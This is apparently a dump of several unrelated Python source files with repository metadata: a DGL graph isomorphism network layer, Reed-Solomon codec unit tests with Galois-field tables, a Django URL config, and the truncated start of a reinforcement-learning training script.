import torch as th
from torch import nn
from .... import function as fn
from ....utils import expand_as_pair
class GINConv(nn.Module):
r"""
Description
-----------
Graph Isomorphism Network layer from paper `How Powerful are Graph
Neural Networks? <https://arxiv.org/pdf/1810.00826.pdf>`__.
.. math::
h_i^{(l+1)} = f_\Theta \left((1 + \epsilon) h_i^{l} +
\mathrm{aggregate}\left(\left\{h_j^{l}, j\in\mathcal{N}(i)
\right\}\right)\right)
Parameters
----------
apply_func : callable activation function/layer or None
If not None, apply this function to the updated node feature,
the :math:`f_\Theta` in the formula.
aggregator_type : str
Aggregator type to use (``sum``, ``max`` or ``mean``).
init_eps : float, optional
Initial :math:`\epsilon` value, default: ``0``.
learn_eps : bool, optional
If True, :math:`\epsilon` will be a learnable parameter. Default: ``False``.
Example
-------
>>> import dgl
>>> import numpy as np
>>> import torch as th
>>> from dgl.nn import GINConv
>>>
>>> g = dgl.graph(([0,1,2,3,2,5], [1,2,3,4,0,3]))
>>> feat = th.ones(6, 10)
>>> lin = th.nn.Linear(10, 10)
>>> conv = GINConv(lin, 'max')
>>> res = conv(g, feat)
>>> res
tensor([[-0.4821, 0.0207, -0.7665, 0.5721, -0.4682, -0.2134, -0.5236, 1.2855,
0.8843, -0.8764],
[-0.4821, 0.0207, -0.7665, 0.5721, -0.4682, -0.2134, -0.5236, 1.2855,
0.8843, -0.8764],
[-0.4821, 0.0207, -0.7665, 0.5721, -0.4682, -0.2134, -0.5236, 1.2855,
0.8843, -0.8764],
[-0.4821, 0.0207, -0.7665, 0.5721, -0.4682, -0.2134, -0.5236, 1.2855,
0.8843, -0.8764],
[-0.4821, 0.0207, -0.7665, 0.5721, -0.4682, -0.2134, -0.5236, 1.2855,
0.8843, -0.8764],
[-0.1804, 0.0758, -0.5159, 0.3569, -0.1408, -0.1395, -0.2387, 0.7773,
0.5266, -0.4465]], grad_fn=<AddmmBackward>)
"""
def __init__(self,
apply_func,
aggregator_type,
init_eps=0,
learn_eps=False):
super(GINConv, self).__init__()
self.apply_func = apply_func
self._aggregator_type = aggregator_type
if aggregator_type == 'sum':
self._reducer = fn.sum
elif aggregator_type == 'max':
self._reducer = fn.max
elif aggregator_type == 'mean':
self._reducer = fn.mean
else:
raise KeyError('Aggregator type {} not recognized.'.format(aggregator_type))
# to specify whether eps is trainable or not.
if learn_eps:
self.eps = th.nn.Parameter(th.FloatTensor([init_eps]))
else:
self.register_buffer('eps', th.FloatTensor([init_eps]))
def forward(self, graph, feat):
r"""
Description
-----------
Compute Graph Isomorphism Network layer.
Parameters
----------
graph : DGLGraph
The graph.
feat : torch.Tensor or pair of torch.Tensor
If a torch.Tensor is given, the input feature of shape :math:`(N, D_{in})` where
:math:`D_{in}` is size of input feature, :math:`N` is the number of nodes.
If a pair of torch.Tensor is given, the pair must contain two tensors of shape
:math:`(N_{in}, D_{in})` and :math:`(N_{out}, D_{in})`.
If ``apply_func`` is not None, :math:`D_{in}` should
fit the input dimensionality requirement of ``apply_func``.
Returns
-------
torch.Tensor
The output feature of shape :math:`(N, D_{out})` where
:math:`D_{out}` is the output dimensionality of ``apply_func``.
If ``apply_func`` is None, :math:`D_{out}` should be the same
as input dimensionality.
"""
with graph.local_scope():
feat_src, feat_dst = expand_as_pair(feat, graph)
graph.srcdata['h'] = feat_src
graph.update_all(fn.copy_u('h', 'm'), self._reducer('m', 'neigh'))
rst = (1 + self.eps) * feat_dst + graph.dstdata['neigh']
if self.apply_func is not None:
rst = self.apply_func(rst)
return rst
| 37.779661
| 92
| 0.545312
|
b2bbd2807283aec2250532eb252310eddd714bb7
| 24,585
|
py
|
Python
|
pyFileFixity/lib/reedsolomon/tests/test_creedsolo.py
|
lrq3000/rfigc
|
a68021a506fee1aabea6b2fb88e685de347d900f
|
[
"MIT"
] | 82
|
2015-03-20T18:43:37.000Z
|
2022-03-05T13:23:12.000Z
|
pyFileFixity/lib/reedsolomon/tests/test_creedsolo.py
|
lrq3000/rfigc
|
a68021a506fee1aabea6b2fb88e685de347d900f
|
[
"MIT"
] | 9
|
2015-12-05T17:32:14.000Z
|
2021-06-11T15:51:38.000Z
|
pyFileFixity/lib/reedsolomon/tests/test_creedsolo.py
|
hadi-f90/pyFileFixity
|
2cb3dd6225a6b062a98fa2d61c4a0a29d8010428
|
[
"MIT"
] | 10
|
2015-12-13T18:51:44.000Z
|
2022-02-21T10:50:28.000Z
|
# To use this script easily (starting with Python 2.7), just cd to the parent folder and type the following command:
# python -m unittest discover tests
from __future__ import print_function
import unittest
import sys
from random import sample
import itertools
try:
from itertools import izip
except ImportError: #python3.x
izip = zip
# Skip this whole module test if running under PyPy (incompatible with Cython)
try:
import __pypy__
# Empty test unit to show the reason of skipping
class TestMissingDependency(unittest.TestCase):
@unittest.skip('Missing dependency - Cython is incompatible with PyPy')
def test_fail():
pass
# Else we're not under PyPy, we can run the test
except ImportError:
__pypy__ = None
from creedsolo import *
try:
bytearray
except NameError:
from creedsolo import bytearray
try: # compatibility with Python 3+
xrange
except NameError:
xrange = range
class cTestReedSolomon(unittest.TestCase):
def test_simple(self):
rs = RSCodec(10)
msg = bytearray("hello world " * 10, "latin1")
enc = rs.encode(msg)
dec = rs.decode(enc)
self.assertEqual(dec, msg)
def test_correction(self):
rs = RSCodec(10)
msg = bytearray("hello world " * 10, "latin1")
enc = rs.encode(msg)
self.assertEqual(rs.decode(enc), msg)
for i in [27, -3, -9, 7, 0]:
enc[i] = 99
self.assertEqual(rs.decode(enc), msg)
enc[82] = 99
self.assertRaises(ReedSolomonError, rs.decode, enc)
def test_long(self):
rs = RSCodec(10)
msg = bytearray("a" * 10000, "latin1")
enc = rs.encode(msg)
dec = rs.decode(enc)
self.assertEqual(dec, msg)
enc[177] = 99
enc[2212] = 88
dec2 = rs.decode(enc)
self.assertEqual(dec2, msg)
def test_prim_fcr_basic(self):
nn = 30
kk = 18
tt = nn - kk
rs = RSCodec(tt, fcr=120, prim=0x187)
hexencmsg = '00faa123555555c000000354064432c02800fe97c434e1ff5365' \
'cf8fafe4'
strf = str if sys.version_info[0] >= 3 else unicode
encmsg = bytearray.fromhex(strf(hexencmsg))
decmsg = encmsg[:kk]
tem = rs.encode(decmsg)
self.assertEqual(encmsg, tem, msg="encoded does not match expected")
tdm = rs.decode(tem)
self.assertEqual(tdm, decmsg, msg="decoded does not match original")
tem1 = bytearray(tem) # clone a copy
# encoding and decoding intact message seem OK, so test errors
numerrs = tt >> 1 # inject tt/2 errors (expected to recover fully)
for i in sample(range(nn), numerrs): # inject errors in random places
tem1[i] ^= 0xff # flip all 8 bits
tdm = rs.decode(tem1)
self.assertEqual(tdm, decmsg,
msg="decoded with errors does not match original")
tem1 = bytearray(tem) # clone another copy
numerrs += 1 # inject tt/2 + 1 errors (expected to fail and detect it)
for i in sample(range(nn), numerrs): # inject errors in random places
tem1[i] ^= 0xff # flip all 8 bits
# if this fails, it means excessive errors not detected
self.assertRaises(ReedSolomonError, rs.decode, tem1)
def test_prim_fcr_long(self):
nn = 48
kk = 34
tt = nn - kk
rs = RSCodec(tt, fcr=120, prim=0x187)
hexencmsg = '08faa123555555c000000354064432c0280e1b4d090cfc04887400' \
'000003500000000e1985ff9c6b33066ca9f43d12e8'
strf = str if sys.version_info[0] >= 3 else unicode
encmsg = bytearray.fromhex(strf(hexencmsg))
decmsg = encmsg[:kk]
tem = rs.encode(decmsg)
self.assertEqual(encmsg, tem, msg="encoded does not match expected")
tdm = rs.decode(tem)
self.assertEqual(tdm, decmsg,
msg="decoded does not match original")
tem1 = bytearray(tem)
numerrs = tt >> 1
for i in sample(range(nn), numerrs):
tem1[i] ^= 0xff
tdm = rs.decode(tem1)
self.assertEqual(tdm, decmsg,
msg="decoded with errors does not match original")
tem1 = bytearray(tem)
numerrs += 1
for i in sample(range(nn), numerrs):
tem1[i] ^= 0xff
self.assertRaises(ReedSolomonError, rs.decode, tem1)
def test_generator_poly(self):
'''Test if generator poly finder is working correctly and if the all generators poly finder does output the same result'''
n = 11
k = 3
# Base 2 test
fcr = 120
generator = 2
prim = 0x11d
init_tables(generator=generator, prim=prim)
g = rs_generator_poly_all(n, fcr=fcr, generator=generator)
self.assertEqual( list(g[n-k]) , list(rs_generator_poly(n-k,fcr=fcr, generator=generator)) )
self.assertEqual( list(g[n-k]) , [1, 106, 9, 105, 86, 5, 166, 76, 9] )
# Base 3 test
fcr = 0
generator = 3
prim = 0x11b
init_tables(generator=generator, prim=prim)
g = rs_generator_poly_all(n, fcr=fcr, generator=generator)
self.assertEqual( list(g[n-k]) , list(rs_generator_poly(n-k,fcr=fcr, generator=generator)) )
self.assertEqual( list(g[n-k]) , [1, 128, 13, 69, 36, 145, 199, 165, 30] )
def test_prime_poly_build(self):
'''Try if the prime polynomials finder works correctly for different GFs (ie, GF(2^6) to GF(2^10)) and with different generators'''
params = {"count": 7,
"c_exp": [6, 7, 7, 8, 8, 9, 10],
"generator": [2, 2, 3, 2, 3, 2, 2],
"expected": [
[67, 91, 97, 103, 109, 115],
[131, 137, 143, 145, 157, 167, 171, 185, 191, 193, 203, 211, 213, 229, 239, 241, 247, 253],
[131, 137, 143, 145, 157, 167, 171, 185, 191, 193, 203, 211, 213, 229, 239, 241, 247, 253],
[285, 299, 301, 333, 351, 355, 357, 361, 369, 391, 397, 425, 451, 463, 487, 501],
[283, 313, 319, 333, 351, 355, 357, 361, 375, 397, 415, 419, 425, 451, 501, 505],
[529, 539, 545, 557, 563, 601, 607, 617, 623, 631, 637, 647, 661, 675, 677, 687, 695, 701, 719, 721, 731, 757, 761, 787, 789, 799, 803, 817, 827, 847, 859, 865, 875, 877, 883, 895, 901, 911, 949, 953, 967, 971, 973, 981, 985, 995, 1001, 1019],
[1033, 1051, 1063, 1069, 1125, 1135, 1153, 1163, 1221, 1239, 1255, 1267, 1279, 1293, 1305, 1315, 1329, 1341, 1347, 1367, 1387, 1413, 1423, 1431, 1441, 1479, 1509, 1527, 1531, 1555, 1557, 1573, 1591, 1603, 1615, 1627, 1657, 1663, 1673, 1717, 1729, 1747, 1759, 1789, 1815, 1821, 1825, 1849, 1863, 1869, 1877, 1881, 1891, 1917, 1933, 1939, 1969, 2011, 2035, 2041]
]
}
for i in xrange(params['count']):
self.assertEqual( find_prime_polys(generator=params['generator'][i], c_exp=params['c_exp'][i]) , params["expected"][i] )
def test_init_tables(self):
'''Try if the look up table generator (galois field generator) works correctly for different parameters'''
params = [
[0x11d, 2, 8],
[0x11b, 3, 8],
[0xfd, 3, 7]
]
expected = [[[0, 0, 1, 25, 2, 50, 26, 198, 3, 223, 51, 238, 27, 104, 199, 75, 4, 100, 224, 14, 52, 141, 239, 129, 28, 193, 105, 248, 200, 8, 76, 113, 5, 138, 101, 47, 225, 36, 15, 33, 53, 147, 142, 218, 240, 18, 130, 69, 29, 181, 194, 125, 106, 39, 249, 185, 201, 154, 9, 120, 77, 228, 114, 166, 6, 191, 139, 98, 102, 221, 48, 253, 226, 152, 37, 179, 16, 145, 34, 136, 54, 208, 148, 206, 143, 150, 219, 189, 241, 210, 19, 92, 131, 56, 70, 64, 30, 66, 182, 163, 195, 72, 126, 110, 107, 58, 40, 84, 250, 133, 186, 61, 202, 94, 155, 159, 10, 21, 121, 43, 78, 212, 229, 172, 115, 243, 167, 87, 7, 112, 192, 247, 140, 128, 99, 13, 103, 74, 222, 237, 49, 197, 254, 24, 227, 165, 153, 119, 38, 184, 180, 124, 17, 68, 146, 217, 35, 32, 137, 46, 55, 63, 209, 91, 149, 188, 207, 205, 144, 135, 151, 178, 220, 252, 190, 97, 242, 86, 211, 171, 20, 42, 93, 158, 132, 60, 57, 83, 71, 109, 65, 162, 31, 45, 67, 216, 183, 123, 164, 118, 196, 23, 73, 236, 127, 12, 111, 246, 108, 161, 59, 82, 41, 157, 85, 170, 251, 96, 134, 177, 187, 204, 62, 90, 203, 89, 95, 176, 156, 169, 160, 81, 11, 245, 22, 235, 122, 117, 44, 215, 79, 174, 213, 233, 230, 231, 173, 232, 116, 214, 244, 234, 168, 80, 88, 175], [1, 2, 4, 8, 16, 32, 64, 128, 29, 58, 116, 232, 205, 135, 19, 38, 76, 152, 45, 90, 180, 117, 234, 201, 143, 3, 6, 12, 24, 48, 96, 192, 157, 39, 78, 156, 37, 74, 148, 53, 106, 212, 181, 119, 238, 193, 159, 35, 70, 140, 5, 10, 20, 40, 80, 160, 93, 186, 105, 210, 185, 111, 222, 161, 95, 190, 97, 194, 153, 47, 94, 188, 101, 202, 137, 15, 30, 60, 120, 240, 253, 231, 211, 187, 107, 214, 177, 127, 254, 225, 223, 163, 91, 182, 113, 226, 217, 175, 67, 134, 17, 34, 68, 136, 13, 26, 52, 104, 208, 189, 103, 206, 129, 31, 62, 124, 248, 237, 199, 147, 59, 118, 236, 197, 151, 51, 102, 204, 133, 23, 46, 92, 184, 109, 218, 169, 79, 158, 33, 66, 132, 21, 42, 84, 168, 77, 154, 41, 82, 164, 85, 170, 73, 146, 57, 114, 228, 213, 183, 115, 230, 209, 191, 99, 198, 145, 63, 126, 252, 229, 215, 179, 123, 246, 241, 255, 227, 219, 171, 75, 150, 49, 98, 196, 149, 55, 110, 220, 165, 87, 174, 65, 130, 25, 50, 100, 200, 141, 7, 14, 28, 56, 112, 224, 221, 167, 83, 166, 81, 162, 89, 178, 121, 242, 249, 239, 195, 155, 43, 86, 172, 69, 138, 9, 18, 36, 72, 144, 61, 122, 244, 245, 247, 243, 251, 235, 203, 139, 11, 22, 44, 88, 176, 125, 250, 233, 207, 131, 27, 54, 108, 216, 173, 71, 142, 1, 2, 4, 8, 16, 32, 64, 128, 29, 58, 116, 232, 205, 135, 19, 38, 76, 152, 45, 90, 180, 117, 234, 201, 143, 3, 6, 12, 24, 48, 96, 192, 157, 39, 78, 156, 37, 74, 148, 53, 106, 212, 181, 119, 238, 193, 159, 35, 70, 140, 5, 10, 20, 40, 80, 160, 93, 186, 105, 210, 185, 111, 222, 161, 95, 190, 97, 194, 153, 47, 94, 188, 101, 202, 137, 15, 30, 60, 120, 240, 253, 231, 211, 187, 107, 214, 177, 127, 254, 225, 223, 163, 91, 182, 113, 226, 217, 175, 67, 134, 17, 34, 68, 136, 13, 26, 52, 104, 208, 189, 103, 206, 129, 31, 62, 124, 248, 237, 199, 147, 59, 118, 236, 197, 151, 51, 102, 204, 133, 23, 46, 92, 184, 109, 218, 169, 79, 158, 33, 66, 132, 21, 42, 84, 168, 77, 154, 41, 82, 164, 85, 170, 73, 146, 57, 114, 228, 213, 183, 115, 230, 209, 191, 99, 198, 145, 63, 126, 252, 229, 215, 179, 123, 246, 241, 255, 227, 219, 171, 75, 150, 49, 98, 196, 149, 55, 110, 220, 165, 87, 174, 65, 130, 25, 50, 100, 200, 141, 7, 14, 28, 56, 112, 224, 221, 167, 83, 166, 81, 162, 89, 178, 121, 242, 249, 239, 195, 155, 43, 86, 172, 69, 138, 9, 18, 36, 72, 144, 61, 122, 244, 245, 247, 243, 251, 235, 203, 139, 11, 22, 44, 88, 176, 125, 250, 233, 207, 131, 27, 54, 108, 216, 173, 71, 142]], [[0, 0, 25, 1, 50, 2, 26, 198, 75, 199, 27, 104, 51, 238, 223, 3, 100, 4, 224, 14, 52, 141, 129, 239, 76, 113, 8, 200, 248, 105, 28, 193, 125, 194, 29, 181, 249, 185, 39, 106, 77, 228, 166, 114, 154, 201, 9, 120, 101, 47, 138, 5, 33, 15, 225, 36, 18, 240, 130, 69, 53, 147, 218, 142, 150, 143, 219, 189, 54, 208, 206, 148, 19, 92, 210, 241, 64, 70, 131, 56, 102, 221, 253, 48, 191, 6, 139, 98, 179, 37, 226, 152, 34, 136, 145, 16, 126, 110, 72, 195, 163, 182, 30, 66, 58, 107, 40, 84, 250, 133, 61, 186, 43, 121, 10, 21, 155, 159, 94, 202, 78, 212, 172, 229, 243, 115, 167, 87, 175, 88, 168, 80, 244, 234, 214, 116, 79, 174, 233, 213, 231, 230, 173, 232, 44, 215, 117, 122, 235, 22, 11, 245, 89, 203, 95, 176, 156, 169, 81, 160, 127, 12, 246, 111, 23, 196, 73, 236, 216, 67, 31, 45, 164, 118, 123, 183, 204, 187, 62, 90, 251, 96, 177, 134, 59, 82, 161, 108, 170, 85, 41, 157, 151, 178, 135, 144, 97, 190, 220, 252, 188, 149, 207, 205, 55, 63, 91, 209, 83, 57, 132, 60, 65, 162, 109, 71, 20, 42, 158, 93, 86, 242, 211, 171, 68, 17, 146, 217, 35, 32, 46, 137, 180, 124, 184, 38, 119, 153, 227, 165, 103, 74, 237, 222, 197, 49, 254, 24, 13, 99, 140, 128, 192, 247, 112, 7], [1, 3, 5, 15, 17, 51, 85, 255, 26, 46, 114, 150, 161, 248, 19, 53, 95, 225, 56, 72, 216, 115, 149, 164, 247, 2, 6, 10, 30, 34, 102, 170, 229, 52, 92, 228, 55, 89, 235, 38, 106, 190, 217, 112, 144, 171, 230, 49, 83, 245, 4, 12, 20, 60, 68, 204, 79, 209, 104, 184, 211, 110, 178, 205, 76, 212, 103, 169, 224, 59, 77, 215, 98, 166, 241, 8, 24, 40, 120, 136, 131, 158, 185, 208, 107, 189, 220, 127, 129, 152, 179, 206, 73, 219, 118, 154, 181, 196, 87, 249, 16, 48, 80, 240, 11, 29, 39, 105, 187, 214, 97, 163, 254, 25, 43, 125, 135, 146, 173, 236, 47, 113, 147, 174, 233, 32, 96, 160, 251, 22, 58, 78, 210, 109, 183, 194, 93, 231, 50, 86, 250, 21, 63, 65, 195, 94, 226, 61, 71, 201, 64, 192, 91, 237, 44, 116, 156, 191, 218, 117, 159, 186, 213, 100, 172, 239, 42, 126, 130, 157, 188, 223, 122, 142, 137, 128, 155, 182, 193, 88, 232, 35, 101, 175, 234, 37, 111, 177, 200, 67, 197, 84, 252, 31, 33, 99, 165, 244, 7, 9, 27, 45, 119, 153, 176, 203, 70, 202, 69, 207, 74, 222, 121, 139, 134, 145, 168, 227, 62, 66, 198, 81, 243, 14, 18, 54, 90, 238, 41, 123, 141, 140, 143, 138, 133, 148, 167, 242, 13, 23, 57, 75, 221, 124, 132, 151, 162, 253, 28, 36, 108, 180, 199, 82, 246, 1, 3, 5, 15, 17, 51, 85, 255, 26, 46, 114, 150, 161, 248, 19, 53, 95, 225, 56, 72, 216, 115, 149, 164, 247, 2, 6, 10, 30, 34, 102, 170, 229, 52, 92, 228, 55, 89, 235, 38, 106, 190, 217, 112, 144, 171, 230, 49, 83, 245, 4, 12, 20, 60, 68, 204, 79, 209, 104, 184, 211, 110, 178, 205, 76, 212, 103, 169, 224, 59, 77, 215, 98, 166, 241, 8, 24, 40, 120, 136, 131, 158, 185, 208, 107, 189, 220, 127, 129, 152, 179, 206, 73, 219, 118, 154, 181, 196, 87, 249, 16, 48, 80, 240, 11, 29, 39, 105, 187, 214, 97, 163, 254, 25, 43, 125, 135, 146, 173, 236, 47, 113, 147, 174, 233, 32, 96, 160, 251, 22, 58, 78, 210, 109, 183, 194, 93, 231, 50, 86, 250, 21, 63, 65, 195, 94, 226, 61, 71, 201, 64, 192, 91, 237, 44, 116, 156, 191, 218, 117, 159, 186, 213, 100, 172, 239, 42, 126, 130, 157, 188, 223, 122, 142, 137, 128, 155, 182, 193, 88, 232, 35, 101, 175, 234, 37, 111, 177, 200, 67, 197, 84, 252, 31, 33, 99, 165, 244, 7, 9, 27, 45, 119, 153, 176, 203, 70, 202, 69, 207, 74, 222, 121, 139, 134, 145, 168, 227, 62, 66, 198, 81, 243, 14, 18, 54, 90, 238, 41, 123, 141, 140, 143, 138, 133, 148, 167, 242, 13, 23, 57, 75, 221, 124, 132, 151, 162, 253, 28, 36, 108, 180, 199, 82, 246]], [[0, 0, 7, 1, 14, 2, 8, 56, 21, 57, 9, 90, 15, 31, 63, 3, 28, 4, 64, 67, 16, 112, 97, 32, 22, 47, 38, 58, 70, 91, 10, 108, 35, 109, 11, 87, 71, 79, 74, 92, 23, 82, 119, 48, 104, 59, 39, 100, 29, 19, 54, 5, 45, 68, 65, 95, 77, 33, 98, 117, 17, 43, 115, 113, 42, 114, 116, 76, 18, 53, 94, 44, 78, 73, 86, 34, 81, 118, 99, 103, 30, 62, 89, 20, 126, 6, 55, 13, 111, 96, 66, 27, 46, 37, 107, 69, 36, 106, 26, 110, 61, 88, 12, 125, 52, 93, 75, 41, 72, 85, 102, 80, 84, 101, 40, 51, 105, 25, 124, 60, 24, 123, 50, 83, 122, 49, 120, 121], [1, 3, 5, 15, 17, 51, 85, 2, 6, 10, 30, 34, 102, 87, 4, 12, 20, 60, 68, 49, 83, 8, 24, 40, 120, 117, 98, 91, 16, 48, 80, 13, 23, 57, 75, 32, 96, 93, 26, 46, 114, 107, 64, 61, 71, 52, 92, 25, 43, 125, 122, 115, 104, 69, 50, 86, 7, 9, 27, 45, 119, 100, 81, 14, 18, 54, 90, 19, 53, 95, 28, 36, 108, 73, 38, 106, 67, 56, 72, 37, 111, 76, 41, 123, 112, 109, 74, 35, 101, 82, 11, 29, 39, 105, 70, 55, 89, 22, 58, 78, 47, 113, 110, 79, 44, 116, 97, 94, 31, 33, 99, 88, 21, 63, 65, 62, 66, 59, 77, 42, 126, 127, 124, 121, 118, 103, 84, 1, 3, 5, 15, 17, 51, 85, 2, 6, 10, 30, 34, 102, 87, 4, 12, 20, 60, 68, 49, 83, 8, 24, 40, 120, 117, 98, 91, 16, 48, 80, 13, 23, 57, 75, 32, 96, 93, 26, 46, 114, 107, 64, 61, 71, 52, 92, 25, 43, 125, 122, 115, 104, 69, 50, 86, 7, 9, 27, 45, 119, 100, 81, 14, 18, 54, 90, 19, 53, 95, 28, 36, 108, 73, 38, 106, 67, 56, 72, 37, 111, 76, 41, 123, 112, 109, 74, 35, 101, 82, 11, 29, 39, 105, 70, 55, 89, 22, 58, 78, 47, 113, 110, 79, 44, 116, 97, 94, 31, 33, 99, 88, 21, 63, 65, 62, 66, 59, 77, 42, 126, 127, 124, 121, 118, 103, 84]]]
for i in xrange(len(params)):
p = params[i]
expected_log_t, expected_exp_t = expected[i]
log_t, exp_t = init_tables(prim=p[0], generator=p[1], c_exp=p[2])
self.assertEqual( list(log_t) , expected_log_t )
self.assertEqual( list(exp_t) , expected_exp_t )
class cTestGFArithmetics(unittest.TestCase):
'''Test Galois Field arithmetics'''
def test_multiply_nolut(self):
'''Try to multiply without look-up tables (necessary to build the look-up tables!)'''
a = 30
b = 19
generator=2
prim=0x11d
# Compare the LUT multiplication and noLUT
init_tables(prim=prim, generator=generator)
self.assertEqual(gf_mul(a, b), gf_mult_noLUT(a, b, prim=prim))
# More Galois Field multiplications
self.assertEqual( gf_mult_noLUT(5, 6, prim=0x11b, field_charac_full=256) , 30 )
self.assertEqual( gf_mult_noLUT(3, 125, prim=0x11b, field_charac_full=256) , 135 )
self.assertEqual( gf_mult_noLUT(2, 200, prim=0x11d, field_charac_full=256) , 141 )
self.assertEqual( gf_mult_noLUT_slow(2, 200, prim=0x11d) , 141 )
# Multiplications in GF(2^7)
self.assertEqual( gf_mult_noLUT(3, 125, prim=0xfd, field_charac_full=128) , 122 )
# Multiplications outside of the finite field (we revert to standard integer multiplications just to see if it works)
self.assertEqual( gf_mult_noLUT(3, 125, prim=0, carryless=False) , 375 )
self.assertEqual( gf_mult_noLUT_slow(4, 125, prim=0) , 500 ) # the second method, just to check that everything's alright
class cTestRSCodecUniversalCrossValidation(unittest.TestCase):
'''Ultimate set of tests of a full set of different parameters for encoding and decoding. If this passes, the codec is universal and can correctly interface with any other RS codec!'''
def test_main(self):
def cartesian_product_dict_items(dicts):
return (dict(izip(dicts, x)) for x in itertools.product(*dicts.values()))
debugg = False # if one or more tests don't pass, you can enable this flag to True to get verbose output to debug
orig_mes = bytearray("hello world", "latin1")
n = len(orig_mes)*2
k = len(orig_mes)
nsym = n-k
istart = 0
params = {"count": 5,
"fcr": [120, 0, 1, 1, 1],
"prim": [0x187, 0x11d, 0x11b, 0xfd, 0xfd],
"generator": [2, 2, 3, 3, 2],
"c_exponent": [8, 8, 8, 7, 7],
}
cases = {
"errmode": [1, 2, 3, 4],
"erratasnb_errorsnb_onlyeras": [[8, 3, False], [6, 5, False], [5, 5, False], [11, 0, True], [11, 0, False], [0,0, False]], # errata number (errors+erasures), erasures number and only_erasures: the last item is the value for only_erasures (True/False)
}
############################$
results_br = []
results_rs = []
it = 0
for p in xrange(params["count"]):
fcr = params["fcr"][p]
prim = params["prim"][p]
generator = params["generator"][p]
c_exponent = params["c_exponent"][p]
for case in cartesian_product_dict_items(cases):
errmode = case["errmode"]
erratanb = case["erratasnb_errorsnb_onlyeras"][0]
errnb = case["erratasnb_errorsnb_onlyeras"][1]
only_erasures = case["erratasnb_errorsnb_onlyeras"][2]
it += 1
if debugg:
print("it ", it)
print("param", p)
print(case)
# REEDSOLO
# Init the RS codec
init_tables(generator=generator, prim=prim, c_exp=c_exponent)
g = rs_generator_poly_all(n, fcr=fcr, generator=generator)
# Encode the message
rmesecc = rs_encode_msg(orig_mes, n-k, gen=g[n-k])
rmesecc_orig = rmesecc[:] # make a copy of the original message to check later if fully corrected (because the syndrome may be wrong sometimes)
# Tamper the message
if erratanb > 0:
if errmode == 1:
sl = slice(istart, istart+erratanb)
elif errmode == 2:
sl = slice(-istart-erratanb-(n-k), -(n-k))
elif errmode == 3:
sl = slice(-istart-erratanb-1, -1)
elif errmode == 4:
sl = slice(-istart-erratanb, None)
if debugg:
print("Removed slice:", list(rmesecc[sl]), rmesecc[sl])
rmesecc[sl] = [0] * erratanb
# Generate the erasures positions (if any)
erase_pos = [x for x in xrange(len(rmesecc)) if rmesecc[x] == 0]
if errnb > 0: erase_pos = erase_pos[:-errnb] # remove the errors positions (must not be known by definition)
if debugg:
print("erase_pos", erase_pos)
print("coef_pos", [len(rmesecc) - 1 - pos for pos in erase_pos])
print("Errata total: ", erratanb-errnb + errnb*2, " -- Correctable? ", (erratanb-errnb + errnb*2 <= nsym))
# Decoding the corrupted codeword
# -- Forney syndrome method
try:
rmes, recc = rs_correct_msg(rmesecc, n-k, fcr=fcr, generator=generator, erase_pos=erase_pos, only_erasures=only_erasures)
results_br.append( rs_check(rmes + recc, n-k, fcr=fcr, generator=generator) ) # check if correct by syndrome analysis (can be wrong)
results_br.append( rmesecc_orig == (rmes+recc) ) # check if correct by comparing to the original message (always correct)
if debugg and not rs_check(rmes + recc, n-k, fcr=fcr, generator=generator) or not (rmesecc_orig == (rmes+recc)): raise ReedSolomonError("False!!!!!")
except ReedSolomonError as exc:
results_br.append(False)
results_br.append(False)
if debugg:
print("====")
print("ERROR! Details:")
print("param", p)
print(case)
print(erase_pos)
print("original_msg", rmesecc_orig)
print("tampered_msg", rmesecc)
print("decoded_msg", rmes+recc)
print("checks: ", rs_check(rmes + recc, n-k, fcr=fcr, generator=generator), rmesecc_orig == (rmes+recc))
print("====")
raise exc
# -- Without Forney syndrome method
try:
mes, ecc = rs_correct_msg_nofsynd(rmesecc, n-k, fcr=fcr, generator=generator, erase_pos=erase_pos, only_erasures=only_erasures)
results_br.append( rs_check(rmes + recc, n-k, fcr=fcr, generator=generator) )
results_br.append( rmesecc_orig == (rmes+recc) )
except ReedSolomonError as exc:
results_br.append(False)
results_br.append(False)
if debugg: print("-----")
self.assertTrue(results_br.count(True) == len(results_br))
if __name__ == "__main__":
unittest.main()
| 75.183486
| 8,627
| 0.537116
|
56f9860d9c2ec3b22735c1efd0b5755482676a33
| 430
|
py
|
Python
|
cats/urls.py
|
bmuha1/companion_cats
|
9e1141757c7d67c1e4bf3fd3bbe706e4d27fef7b
|
[
"MIT"
] | 1
|
2020-05-22T23:52:08.000Z
|
2020-05-22T23:52:08.000Z
|
cats/urls.py
|
bmuha1/companion_cats
|
9e1141757c7d67c1e4bf3fd3bbe706e4d27fef7b
|
[
"MIT"
] | 5
|
2021-03-30T12:50:19.000Z
|
2021-09-22T18:40:59.000Z
|
cats/urls.py
|
bmuha1/companion_cats
|
9e1141757c7d67c1e4bf3fd3bbe706e4d27fef7b
|
[
"MIT"
] | null | null | null |
from django.urls import path, re_path
from . import views
urlpatterns = [
path('', views.home, name='cats-home'),
path('about/', views.about, name='cats-about'),
path('all/', views.all, name='cats-all'),
path('find/', views.find, name='cats-find'),
path('cat/<int:cat_id>', views.cat, name='cats-cat'),
# path('random/', views.random, name='cats-random'),
# path('add/', views.add, name='cats-add')
]
| 33.076923
| 57
| 0.616279
|
32ee8f20b62034f8860a9ea28dd0333dd429df43
| 3,594
|
py
|
Python
|
HW4-3/ACAgent_play.py
|
b05611038/MLDS_2019SPRING
|
0591a1a6f461da0a02b9e1b83f37ad3579f36f4d
|
[
"MIT"
] | 3
|
2019-06-20T06:47:30.000Z
|
2021-11-05T03:16:37.000Z
|
HW4-3/ACAgent_play.py
|
b05611038/MLDS_2019SPRING
|
0591a1a6f461da0a02b9e1b83f37ad3579f36f4d
|
[
"MIT"
] | null | null | null |
HW4-3/ACAgent_play.py
|
b05611038/MLDS_2019SPRING
|
0591a1a6f461da0a02b9e1b83f37ad3579f36f4d
|
[
"MIT"
] | null | null | null |
import time
import argparse
from lib.utils import *
from lib.trainer import ACTrainer
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def construct_observation_preprocess_dict(args):
preprocess_dict = {}
preprocess_dict['slice_scoreboard'] = args[0]
preprocess_dict['gray_scale'] = args[1]
preprocess_dict['minus_observation'] = args[2]
return preprocess_dict
def construct_reward_preprocess_dict(args):
preprocess_dict = {}
preprocess_dict['time_decay'] = args[0]
preprocess_dict['normalized'] = args[1]
return preprocess_dict
def init_parser(main):
parser = argparse.ArgumentParser()
parser.add_argument('model_type', type = str, help = 'One model can choose. [baseline]')
